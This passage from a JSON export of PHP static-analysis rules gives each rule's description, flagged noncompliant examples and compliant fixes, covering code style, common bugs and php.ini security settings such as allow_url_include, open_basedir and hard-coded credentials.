Such code is hard to read, refactor and therefore to maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction f () {\n  function f_inner () {\n    function f_inner_inner() {\n      function f_inner_inner_inner() { \/\/ Noncompliant\n      }\n    }\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S2005","repo":"php","name":"String literals should not be concatenated","htmlDesc":"<p>There is no reason to concatenate literal strings. Doing so is an exercise in reducing code readability. Instead, the strings should be\ncombined.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$msg = \"Hello \" . \"${name}\" . \"!\";  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$msg = \"Hello ${name}!\";\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2007","repo":"php","name":"Functions and variables should not be defined outside of classes","htmlDesc":"<p>Defining and using global variables and global functions, when the convention dictates OOP can be confusing and difficult to use properly for\nmultiple reasons:<\/p>\n<ul>\n  <li> You run the risk of name clashes. <\/li>\n  <li> Global functions must be stateless, or they can cause difficult-to-track bugs. <\/li>\n  <li> Global variables can be updated from anywhere and may no longer hold the value you expect. <\/li>\n  <li> It is difficult to properly test classes that use global functions. <\/li>\n<\/ul>\n<p>Instead of being declared globally, such variables and functions should be moved into a class, potentially marked <code>static<\/code>, so they can\nbe used without a class instance. 
<\/p>\n<p>This rule checks that only object-oriented programming is used and that no functions or procedures are declared outside of a class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n\n$name = \"Bob\"; \/\/ Noncompliant\n\nfunction doSomething($arg) {   \/\/ Noncompliant\n  \/\/...\n}\n\nclass MyClass {\n    \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\nclass MyClass {\n\n  public static $name = \"Bob\"; \/\/ Compliant\n\n  public static function doSomething($arg) {              \/\/ Compliant\n    \/\/...\n  }\n  \/\/...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2010","repo":"php","name":"\"&&\" and \"||\" should be used","htmlDesc":"<p>PHP has two sets of logical operators: <code>&amp;&amp;<\/code> \/ <code>||<\/code>, and <code>and<\/code> \/ <code>or<\/code>. The difference between\nthe sets is precedence. Because <code>and<\/code> \/ <code>or<\/code> have a lower precedence than almost any other operator, using them instead of\n<code>&amp;&amp;<\/code> \/ <code>||<\/code> may not have the result you expect.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time and $have_money;  \/\/ Noncompliant. $take_vacation == true.\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time &amp;&amp; $have_money;  \/\/ $take_vacation == false.\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2011","repo":"php","name":"\"global\" should not be used","htmlDesc":"<p>Global variables are a useful construct, but they should not be abused. Functions can access the global scope either through the\n<code>global<\/code> keyword or through the <code>$GLOBALS<\/code> array, but these practices considerably reduce the function's readability and\nreusability. 
Instead, the global variable should be passed as a parameter to the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myGlobalVariable;\n\nfunction foo()\n{\n  global $myGlobalVariable; \/\/ Noncompliant\n  $GLOBALS['myGlobalVariable']; \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo($myStateVariable)\n{\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2014","repo":"php","name":"\"$this\" should not be used in a static context","htmlDesc":"<p><code>$this<\/code> refers to the current class instance. But static methods can be accessed without instantiating the class, and <code>$this<\/code>\nis not available to them. Using <code>$this<\/code> in a static context will result in a fatal error at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Clazz {\n  public $name = NULL;  \/\/ instance variable\n\n  public static function foo(){\n    if ($this-&gt;name != NULL) {\n      \/\/ ...\n    }\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Clazz {\n  public $name = NULL;  \/\/ instance variable\n\n  public static function foo($nameParam){\n    if ($nameParam != NULL) {\n      \/\/ ...\n    }\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2036","repo":"php","name":"Files that define symbols should not cause side-effects","htmlDesc":"<p>Files that define symbols such as classes and variables may be included into many files. Simply performing that inclusion should have no effect on\nthose files other than declaring new symbols. For instance, a file containing a class definition should not also contain side-effects such as\n<code>print<\/code> statements that will be evaluated automatically on inclusion. Logic should be segregated into symbol-only files and\nside-effect-only files. 
The type of operation which is not allowed in a symbol-definition file includes but is not limited to: <\/p>\n<ul>\n  <li> generating output <\/li>\n  <li> modifying <code>ini<\/code> settings <\/li>\n  <li> emitting errors or exceptions <\/li>\n  <li> modifying global or static variables <\/li>\n  <li> reading\/writing files <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n\nprint \"Include worked!\";\n\nclass foo {\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n\nclass foo {\n\n  public function log() {\n    print \"Include worked!\";\n  }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/www.php-fig.org\/psr\/psr-1\/\">PHP-FIG Basic Coding Standard PSR1<\/a>, 2.3 - Side Effects <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2037","repo":"php","name":"Static members should be referenced with \"static::\"","htmlDesc":"<p>References in a class to static class members (fields or methods) can be made using either <code>self::$var<\/code> or <code>static::$var<\/code>\n(introduced in 5.3). The difference between the two is one of scope. Confusingly, in subclasses, the use of <code>self::<\/code> references the\noriginal definition of the member, i.e. the superclass version, rather than any override at the subclass level. 
<code>static::<\/code>, on the other\nhand, references the class that was called at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n\nclass Toy {\n\n    public static function status() {\n        self::getStatus();  \/\/ Noncompliant; will always print \"Sticks are fun!\" even when called from a subclass which overrides this method;\n    }\n\n    protected static function getStatus() {\n        echo \"Sticks are fun!\";\n    }\n}\n\nclass Ball extends Toy {\n\n    protected static function getStatus() {  \/\/ Doesn't actually get called\n        echo \"Balls are fun!\";\n    }\n}\n\n$myBall = new Ball();\n$myBall::status();  \/\/ Prints \"Sticks are fun!\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n\nclass Toy {\n\n    public static function status() {\n        static::getStatus();  \/\/ Compliant\n    }\n\n    protected static function getStatus() {\n        echo \"Sticks are fun!\";\n    }\n}\n\nclass Ball extends Toy {\n\n    protected static function getStatus() {\n        echo \"Balls are fun!\";\n    }\n}\n\n$myBall = new Ball();\n$myBall::status();  \/\/ Prints \"Balls are fun!\"\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>self<\/code> is used on a constant field, a private field or a private method.<\/p>\n<pre>\nclass A\n{\n    private static $somevar = \"hello\";\n    const CONSTANT = 42;\n\n    private static function foo()\n    {\n        $var = self::$somevar . self::CONSTANT;  \/\/ Should be OK\n        self::foo();                               \/\/ Should be OK\n    }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2038","repo":"php","name":"Colors should be defined in upper case","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. 
Writing colors in upper case makes them stand out as such, thereby making the\ncode easier to read.<\/p>\n<p>This rule checks that hexadecimal color definitions are written in upper case.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$white = '#ffffff';  \/\/ Noncompliant\n$dkgray = '#006400';\n$aqua = '#00ffff';  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$white = '#FFFFFF';  \/\/ Compliant\n$dkgray = '#006400';\n$aqua = '#00FFFF';  \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2041","repo":"php","name":"Parentheses should not be used for calls to \"echo\"","htmlDesc":"<p><code>echo<\/code> can be called with or without parentheses, but it is best practice to leave parentheses off the call because using parentheses\nwith multiple arguments will result in a parse error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho(\"Hello\");  \/\/ Noncompliant, but it works\necho(\"Hello\", \"World\"); \/\/ Noncompliant. Parse error\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho \"Hello\";\necho \"Hello\",\"World!\";\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2043","repo":"php","name":"Superglobals should not be accessed directly","htmlDesc":"<p>Superglobal variables are predefined variables available in all scopes throughout a script. However, accessing them directly is considered bad\npractice. 
Instead, they should be accessed through an object or framework that handles sanitation and validation.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$name = $_POST['name'];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$name = $this-&gt;params()-&gt;fromPost('name');\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2044","repo":"php","name":"\"php_sapi_name()\" should not be used","htmlDesc":"<p>Both <code>php_sapi_name()<\/code> and the <code>PHP_SAPI<\/code> constant give the same value. But calling the function is less efficient than simply\nreferencing the constant. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (php_sapi_name() == 'test') { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (PHP_SAPI == 'test') { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2046","repo":"php","name":"Perl-style comments should not be used","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule flags all Perl-style comments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myvar; # Noncompliant; this comment should have started with \"\/\/\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$myvar; \/\/ Compliant; this comment started with \"\/\/\"\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2047","repo":"php","name":"The names of methods with boolean return values should start with \"is\" or \"has\"","htmlDesc":"<p>Well-named functions can allow the users of your code to understand at a glance what to expect from the function - even before reading the\ndocumentation. 
Toward that end, methods returning a boolean property should have names that start with \"is\" or \"has\" rather than with \"get\".<\/p>\n<p>Note that this rule will only apply to functions that are documented to return a boolean.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function getFoo() \/\/ Noncompliant\n{\n  return foo;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function isFoo()\n{\n  return true;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2050","repo":"php","name":"Alias functions should not be used","htmlDesc":"<p>Certain functions exist in PHP only as aliases of other functions. These aliases have been made available for backward compatibility, but should\nreally be removed from code. <\/p>\n<p>This rule looks for uses of the following aliases:<\/p>\n<table>\n  <tbody>\n    <tr>\n      <th>Alias<\/th>\n      <th>Replacement<\/th>\n    <\/tr>\n    <tr>\n      <td><code>chop<\/code><\/td>\n      <td><code>rtrim<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>close<\/code><\/td>\n      <td><code>closedir<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>doubleval<\/code><\/td>\n      <td><code>floatval<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>fputs<\/code><\/td>\n      <td><code>fwrite<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>ini_alter<\/code><\/td>\n      <td><code>ini_set<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_double<\/code><\/td>\n      <td><code>is_float<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_integer<\/code><\/td>\n      <td><code>is_int<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_long<\/code><\/td>\n      <td><code>is_int<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_real<\/code><\/td>\n      <td><code>is_float<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_writeable<\/code><\/td>\n      
<td><code>is_writable<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>join<\/code><\/td>\n      <td><code>implode<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>key_exists<\/code><\/td>\n      <td><code>array_key_exists<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>magic_quotes_runtime<\/code><\/td>\n      <td><code>set_magic_quotes_runtime<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>pos<\/code><\/td>\n      <td><code>current<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>show_source<\/code><\/td>\n      <td><code>highlight_file<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>sizeof<\/code><\/td>\n      <td><code>count<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>strchr<\/code><\/td>\n      <td><code>strstr<\/code><\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho sizeof($arr);  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho count($arr);\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2068","repo":"php","name":"Credentials should not be hard-coded","htmlDesc":"<p>Because it is easy to extract strings from a compiled application, credentials should never be hard-coded. Do so, and they're almost guaranteed to\nend up in the hands of an attacker. 
This is particularly true for applications that are distributed.<\/p>\n<p>Credentials should be stored outside of the code in a strongly-protected encrypted configuration file or database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$uname = \"steve\";\n$password = \"blue\";\nconnect($uname, $password);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$uname = getEncryptedUser();\n$password = getEncryptedPass();\nconnect($uname, $password);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/798\">MITRE, CWE-798<\/a> - Use of Hard-coded Credentials <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/259\">MITRE, CWE-259<\/a> - Use of Hard-coded Password <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Porous Defenses <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A2-Broken_Authentication_and_Session_Management\">OWASP Top Ten 2013 Category A2<\/a> -\n  Broken Authentication and Session Management <\/li>\n  <li> Derived from FindSecBugs rule <a href=\"http:\/\/h3xstream.github.io\/find-sec-bugs\/bugs.htm#HARD_CODE_PASSWORD\">Hard Coded Password<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S2260","repo":"php","name":"PHP parser failure","htmlDesc":"<p>When the PHP parser fails, it is possible to record the failure as a violation on the file. 
This way, not only is it possible to track the number\nof files that do not parse but also to easily find out why they do not parse.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2681","repo":"php","name":"Multiline blocks should be enclosed in curly braces","htmlDesc":"<p>Curly braces can be omitted from a one-line block, such as with an <code>if<\/code> statement or <code>for<\/code> loop, but doing so can be\nmisleading and induce bugs. <\/p>\n<p>This rule raises an issue when the indentation of the lines after a one-line block indicates an intent to include those lines in the block, but the\nomission of curly braces means the lines will be unconditionally executed once.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($condition)\n  firstActionInBlock();\n  secondAction();  \/\/ Noncompliant; executed unconditionally\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i &lt; count($array); $i++)\n  $str = $array[$i];\n  doTheThing($str);  \/\/ Noncompliant; executed only on last array element\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($condition) {\n  firstActionInBlock();\n  secondAction();\n}\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i &lt; count($array); $i++) {\n  $str = $array[$i];\n  doTheThing($str);\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/483.html\">MITRE, CWE-483<\/a> - Incorrect Block Delimitation <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n  <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2830","repo":"php","name":"Class constructors should not create other objects","htmlDesc":"<p>Dependency injection is a software design pattern in which one or more dependencies (or services) are injected, or passed by reference, into a\ndependent object (or client) 
and are made part of the client's state. The pattern separates the creation of a client's dependencies from its own\nbehavior, which allows program designs to be loosely coupled and to follow the dependency inversion and single responsibility principles.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass SomeClass {\n\n  public function __construct() {\n    $this-&gt;object = new SomeOtherClass();  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass SomeClass {\n\n  public function __construct(SomeOtherClass $object) {\n    $this-&gt;object = $object;\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S3332","repo":"php","name":"Session-management cookies should not be persistent","htmlDesc":"<p>Cookies without fixed lifetimes or expiration dates are known as non-persistent, or \"session\" cookies, meaning they last only as long as the\nbrowser session, and poof away when the browser closes. Cookies with expiration dates, \"persistent\" cookies, are stored\/persisted until those\ndates.<\/p>\n<p>Non-persistent cookies should be used for the management of logged-in sessions on web sites. 
To make a cookie non-persistent, simply omit the\n<code>expires<\/code> attribute.<\/p>\n<p>This rule raises an issue when <code>expires<\/code> is set for a session cookie, either programmatically or via configuration, such as\n<code>session.cookie_lifetime<\/code>.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n  (XSS) <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Session_Management_Cheat_Sheet#Expire_and_Max-Age_Attributes\">OWASP, Session Management Cheat\n  Sheet<\/a> - Expire and Max-Age Attributes <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3333","repo":"php","name":"\"open_basedir\" should limit file access","htmlDesc":"<p>The <code>open_basedir<\/code> configuration in <em>php.ini<\/em> limits the files the script can access using, for example, <code>include<\/code> and\n<code>fopen()<\/code>. Leave it out, and there is no default limit, meaning that any file can be accessed. Include it, and PHP will refuse to access\nfiles outside the allowed path.<\/p>\n<p><code>open_basedir<\/code> should be configured with a directory, which will then be accessible recursively. However, the use of <code>.<\/code>\n(current directory) as an <code>open_basedir<\/code> value should be avoided since it's resolved dynamically during script execution, so a\n<code>chdir('\/')<\/code> command could lay the whole server open to the script.<\/p>\n<p>This is not a fool-proof configuration; it can be reset or overridden at the script level. But its use should be seen as a minimum due diligence\nstep. 
This rule raises an issue when <code>open_basedir<\/code> is not present in <em>php.ini<\/em>, and when <code>open_basedir<\/code> contains root,\nor the current directory (<code>.<\/code>) symbol.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini try 1\n; open_basedir=\"${USER}\/scripts\/data\"  Noncompliant; commented out\n\n; php.ini try 2\nopen_basedir=\"\/:${USER}\/scripts\/data\"  ; Noncompliant; root directory in the list\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini try 1\nopen_basedir=\"${USER}\/scripts\/data\"\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3334","repo":"php","name":"\"allow_url_fopen\" and \"allow_url_include\" should be disabled","htmlDesc":"<p><code>allow_url_fopen<\/code> and <code>allow_url_include<\/code> allow code to be read into a script from URLs. The ability to suck in executable\ncode from outside your site, coupled with imperfect input cleansing could lay your site bare to attackers. 
Even if your input filtering is perfect\ntoday, are you prepared to bet your site that it will always be perfect in the future?<\/p>\n<p>This rule raises an issue when either property is explicitly enabled in <em>php.ini<\/em> and when <code>allow_url_fopen<\/code>, which defaults to\nenabled, is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini  Noncompliant; allow_url_fopen not explicitly disabled\nallow_url_include=1  ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nallow_url_fopen=0\nallow_url_include=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/829.html\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A1-Injection\">OWASP Top Ten 2013 Category A1<\/a> - Injection <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3335","repo":"php","name":"\"cgi.force_redirect\" should be enabled","htmlDesc":"<p>The <code>cgi.force_redirect<\/code> <em>php.ini<\/em> configuration is on by default, and it prevents unauthenticated access to scripts when PHP is\nrunning as a CGI. 
Unfortunately, it must be disabled on IIS, OmniHTTPD and Xitami, but in all other cases it should be on.<\/p>\n<p>This rule raises an issue when <code>cgi.force_redirect<\/code> is explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\ncgi.force_redirect=0  ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/305\">MITRE, CWE-305<\/a> - Authentication Bypass by Primary Weakness <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n  Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3336","repo":"php","name":"\"session.use_trans_sid\" should not be enabled","htmlDesc":"<p>PHP's <code>session.use_trans_sid<\/code> automatically appends the user's session id to URLs when cookies are disabled. On the face of it, this\nseems like a nice way to let uncookie-able users use your site anyway. In reality, it makes those users vulnerable to having their sessions hijacked\nby anyone who might:<\/p>\n<ul>\n  <li> see the URL over the user's shoulder <\/li>\n  <li> be sent the URL by the user <\/li>\n  <li> retrieve the URL from browser history <\/li>\n  <li> ... 
<\/li>\n<\/ul>\n<p>For that reason, it's better to practice a little \"tough love\" with your users and force them to turn on cookies.<\/p>\n<p>Since <code>session.use_trans_sid<\/code> is off by default, this rule raises an issue when it is explicitly enabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nsession.use_trans_sid=1  ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n  Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3337","repo":"php","name":"\"enable_dl\" should be disabled","htmlDesc":"<p><code>enable_dl<\/code> is on by default and allows <code>open_basedir<\/code> restrictions, which limit the files a script can access, to be\nignored. For that reason, it's a dangerous option and should be explicitly turned off.<\/p>\n<p>This rule raises an issue when <code>enable_dl<\/code> is not explicitly set to 0 in <em>php.ini<\/em>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nenable_dl=1  ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nenable_dl=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3338","repo":"php","name":"\"file_uploads\" should be disabled","htmlDesc":"<p><code>file_uploads<\/code> is an on-by-default PHP configuration that allows files to be uploaded to your site. 
Since accepting <del>candy<\/del>\nfiles from strangers is inherently dangerous, this feature should be disabled unless it is absolutely necessary for your site.<\/p>\n<p>This rule raises an issue when <code>file_uploads<\/code> is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nfile_uploads=1  ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nfile_uploads=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/434.html\">MITRE, CWE-434<\/a> - Unrestricted Upload of File with Dangerous Type <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Insecure Interaction Between Components <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S881","repo":"php","name":"Increment (++) and decrement (--) operators should not be used in a method call or mixed with other operators in an expression","htmlDesc":"<p>The use of increment and decrement operators in method calls or in combination with other arithmetic operators is not recommended, because:<\/p>\n<ul>\n  <li> It can significantly impair the readability of the code. <\/li>\n  <li> It introduces additional side effects into a statement, with the potential for undefined behavior. <\/li>\n  <li> It is safer to use these operators in isolation from any other arithmetic operators. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$u8a = ++$u8b + $u8c--;\n$foo = $bar++ \/ 4;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<p>The following sequence is clearer and therefore safer:<\/p>\n<pre>\n++$u8b;\n$u8a = $u8b + $u8c;\n$u8c--;\n$foo = $bar \/ 4;\n$bar++;\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 12.1 - Limited dependence should be placed on the C operator precedence rules in expressions. 
<\/li>\n  <li> MISRA C:2004, 12.13 - The increment (++) and decrement (--) operators should not be mixed with other operators in an expression. <\/li>\n  <li> MISRA C++:2008, 5-2-10 - The increment (++) and decrement (--) operator should not be mixed with other operators in an expression. <\/li>\n  <li> MISRA C:2012, 12.1 - The precedence of operators within expressions should be made explicit <\/li>\n  <li> MISRA C:2012, 13.3 - A full expression containing an increment (++) or decrement (--) operator should have no other potential side effects\n  other than that caused by the increment or decrement operator <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZwE\">CERT, EXP30-C.<\/a> - Do not depend on the order of evaluation for side effects\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/fYAyAQ\">CERT, EXP50-CPP.<\/a> - Do not depend on the order of evaluation for side\n  effects <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/yQC7AQ\">CERT, EXP05-J.<\/a> - Do not follow a write by a subsequent write or read of the\n  same object within an expression <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S905","repo":"php","name":"Non-empty statements should change control flow or have at least one side-effect","htmlDesc":"<p>Any statement (other than a null statement, which means a statement containing only a semicolon <code>;<\/code>) which has no side effect and does\nnot result in a change of control flow will normally indicate a programming error, and therefore should be refactored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a == 1; \/\/ Noncompliant; was assignment intended?\n$a &lt; $b; \/\/ Noncompliant; have we forgotten to assign the result to a variable?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/482\">MITRE, CWE-482<\/a> - Comparing instead of Assigning 
